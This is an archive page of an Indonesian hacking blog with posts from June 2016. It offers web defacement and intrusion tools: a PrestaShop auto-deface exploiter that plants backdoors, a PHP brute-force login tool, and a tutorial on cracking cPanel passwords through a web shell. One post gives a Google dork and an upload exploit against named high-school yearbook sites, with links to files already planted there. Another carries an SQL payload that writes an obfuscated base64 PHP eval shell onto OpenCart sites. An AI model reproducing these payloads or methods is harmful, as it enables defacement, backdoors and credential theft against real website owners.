Postingan

Menampilkan postingan dari Juni, 2016

How To found uploader in website.

-
Gambar
*nb: Diperuntukan buat yang udah ada shell ini cocok banget buat yg pengen menemukan bug baru di plugins atau themes wordpress atau joomla. bukan menemukan bug baru sih, tapi menemukan file yang ada kata - kata upload nya melalui shell. ya daripada kita buka satu - satu dir untuk nyari file upload. mending pakai tool ini. ada 2 file yang dipakai disini. search.php http://pastebin.com/G1vnLbUt index.php http://pastebin.com/nenExAFA file search.php langsung diupload aja ke websitenya. file index.php dibuka dan diedit bagian dirnya. usage: php index.php http://victim/search.php video: https://youtu.be/lniKnyGLxoo keep share. join yukk. https://www.facebook.com/groups/indoxploitpublic/
Posting Komentar
Read more »

PrestaShop Auto Deface by iDx

-
Gambar
Dalam zip ini, udah ada exploiter,doc root,shell idx. dan didalam source exploiternyaa, sudah ada penjelasan, file" apa yang boleh diganti dan tidak diganti , selebihnya harap ikutin code yang ada , daripada nantinya error, tanggung sendiri:p fitur: - auto tanem backdoor - auto deface - hasil nya ke simpen dalam "hasil.txt", taro semuanya dalam 1 folder yang sama ( CLI version ) jalankan lewat cmd/terminal/vps Cara Pake: * masukan seluruh target anda ( full url: http://www.target.com/path/path/path/uploadimage.php ) ke dalam sebuah file.txt. * lalu jalankan cmd pada terminal seperti pada gambar diatas. format target. ( dalam file.txt ) http://www.target1.com/path/path/path/uploadimage.php http://www.target2.com/path/path/path/uploadimage.php http://www.target3.com/path/path/path/uploadimage.php http://www.target4.com/path/path/path/uploadimage.php http://www.target5.com/path/path/path/uploadimage.php Download: http://adf.ly/1bWOfF Okee sekiann duluuuu ^^ Thanks ...
Posting Komentar
Read more »

Deface High school

-
Deface High school bingung namanya apaan. ngeliat orang show off terus gw telusuri bugnya. sebar dah ;v dork: intext:Welcome to our electronic class yearbook exploit: /forum_topic_create.php?forumid=1 upload your script in txt. video: https://www.youtube.com/watch?v=nnzZwihXO2o nih hasilnya. http://www.denfeld61.com//files_forum/18_k.txt http://www.denfeld65.com//files_forum/253_k.txt http://www.provinerams1969.net//files_forum/2397_k.txt http://www.denfeld63.com/files_forum/67_k.jpg http://www.denfeld62.com//files_forum/183_k.jpg http://www.denfeld66.com/files_forum/27_k.txt http://www.savannahhigh1963.com/files_forum/52_k.txt http://www.salemhighschool1959.com/files_forum/30_k.txt http://www.tulsamemorial64.com/files_forum/29_k.txt http://www.lanier57.com/files_forum/137_k.txt http://dulutheast1965.com/files_forum/23_k.txt keep share. gabung yuk! group
Posting Komentar
Read more »

Tool Bruteforce Fleksibel

-
Gambar
Kali ini gw pengen share tool bruteforce yang menurut gw cukup fleksibel. mirip kayak hydra kalo ngk salah. tapi agak ribet, karena banyak parameter yang harus dimasukin. yaudah langsung aja ini dia toolnya. script: http://pastebin.com/9Z5fUhNK Usage : php brute.php password.txt "username=admin&password=PASS::fail" url PASS jangan diganti! password.txt password_1<br>password_2<br>password_3 fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah url ganti jadi url action loginnya. tonton videonya biar ngk bingung. https://youtu.be/zt7XNISMf9g keep share. gabung yuk! group
Posting Komentar
Read more »

Tutorial Crack Cpanel dengan IndoXploit Shell

-
Gambar
Okee gan kali ini gua akan share Tutorial Crack Cpanel dengan IndoXploit Shell. karena banyak sekali yang blm ngerti gunain fitur crack cpanel ini. ( kita sudah harus mendapatkan akses shell backdoor dan memiliki "banyak" config grab dalam tutorial kali ini ) Sebelumnya sedikit info bagi yang blm tau, indoxploit shell fitur crack cpanel sudah otomatis grab password. ( ikutin saja petunjuk yang tertera ) kalo blm paham maksud dari petunjuk nya apa, liat ss dibawah ini: Yap, fitur crack cpanel akan otomatis grab passwordnya jika kita menjalankannya di dalam folder config tersebut. NB: Tidak harus di folder idx_config di folder config dari shell lain pun bisa Okeee, jika sudah sesuai dengan petunjuk diatas. Kita lansung menuju fitur "Crack Cpanel" dalam indoxploit shell. indoxploit shell yang dapat melakukan trik ini ) Baca Pentunjuk dalam SS diatas ! Okee jika sudah lansung saja kita klik "Crack" : Yapp, jika berhasil akan seperti gambar di atas. ...
Posting Komentar
Read more »

Mengambil kata menggunakan preg_match

-
Gambar
Abis baca - baca thread lama gw di  http://hacker-newbie.org/showthread.php?tid=20672 jadi terharuu.. ternyata udh 2 tahunan maenan exploiter. sebelumnya gw ucapin byk2 terima kasih kepada bang sohai yang udah ngebimbing gw sejauh ini, bunglon_ijo yang ikut berjuang bersama - sama, rieqyns13 yang udah mau share scannernya. dan buat lu semua yang udah mau baca tutor ini yang sebenarnya sih ngk terlalu berguna banget... *Perhatikan kata demi kata yang tak bermakna ini. sebelumnya mari baca - baca tentang preg_match dulu disini http://php.net/manual/en/function.preg-match.php tapi disini ane cuma pengen share cara mengambil kata dengan preg_match. untuk apasih ? misalnya kita sedang membuat auto upload. dan ternyata nama filenya menjadi random. daripada susah - susah ngecek satu per satu secara manual, mending kita ambil aja nama file random itu dan kemudian cek. mudah saja, misalnya disaat kita selesai upload, outputnya menjadi seperti ini. "filename":"420331file.php...
Posting Komentar
Read more »

Upload shell di cms opencart

-
kali ini ane pengen bagiin tutor upload shell di website cms opencart. work versi 2 keatas.. cari targetnya bisa pake bruteforce disini http://blog.indoxploit.or.id/2016/06/deface-dengan-opencart-bruteforce-and.html langsung aja ke videonya .. https://www.youtube.com/watch?v=CA6BvEopCEo a.sql SELECT '<?php eval (gzinflate(base64_decode("bZBNasNADIX3hd5hGLqIoW4OUHvIpoVCIIV0F4KRbY09MD/C1gRC8d3rcWJooaCNvqenJ4RNH4TswDP6rqgHJV8fHzBB6qmKHhxushXJdcDozVP1eTh+Zd9Ls2sCXWf0/rF/O56klueTZEdVssvz81/hBrNkTVvnparGoYfR2GJbqzxX8uU/x5w7oR3xl6+DDmw6aFrqrgpxv1aHwQmH3Ie2pDCyQN/wlbB00bIhGHibRvIWGFRhPEUWi66NRZFSS73ypbvc5DHWzrAw7QwuYCOWkdT6m+kH"))); ?>' FROM `mouwaffek_table` thx to spyhackerz.com
Posting Komentar
Read more »

Deface dengan Opencart Bruteforce and Upload image

-
Gambar
Kali ini ane pengen share tool bf + upload image di opencart. referensi: http://spyhackerz.com/forum/threads/thewayend-opencart-twe-gif-video.1392/ script: http://pastebin.com/vGRNXUuc usage: php Xploit.php target.htm target.htm site1.com<br>site2.com<br>site3.com untuk pengguna windows mungkin bisa install xampp, kemudian taruh script ini di \xampp\php\ dan juga targetnya. abis itu jalanin pake cmd. #Keepshare.
Posting Komentar
Read more »

Google Dorker New 2016

-
Gambar
Google Dorker New. kali ini ane pengen share google dorker yg ngambil dari source hasil curl google. tapi kyknya kurang joss ini. dikembangin aja lagi.. ini dia: http://pastebin.com/9heDxH1K Video: https://www.youtube.com/watch?v=Ggv4kkYMEM8 update!! google dorker with dom. http://pastebin.com/KccgySw0 video: https://www.youtube.com/watch?v=A2zpIZvPgtQ #Keepshare join yuk. https://www.facebook.com/groups/indoxploitpublic/
Posting Komentar
Read more »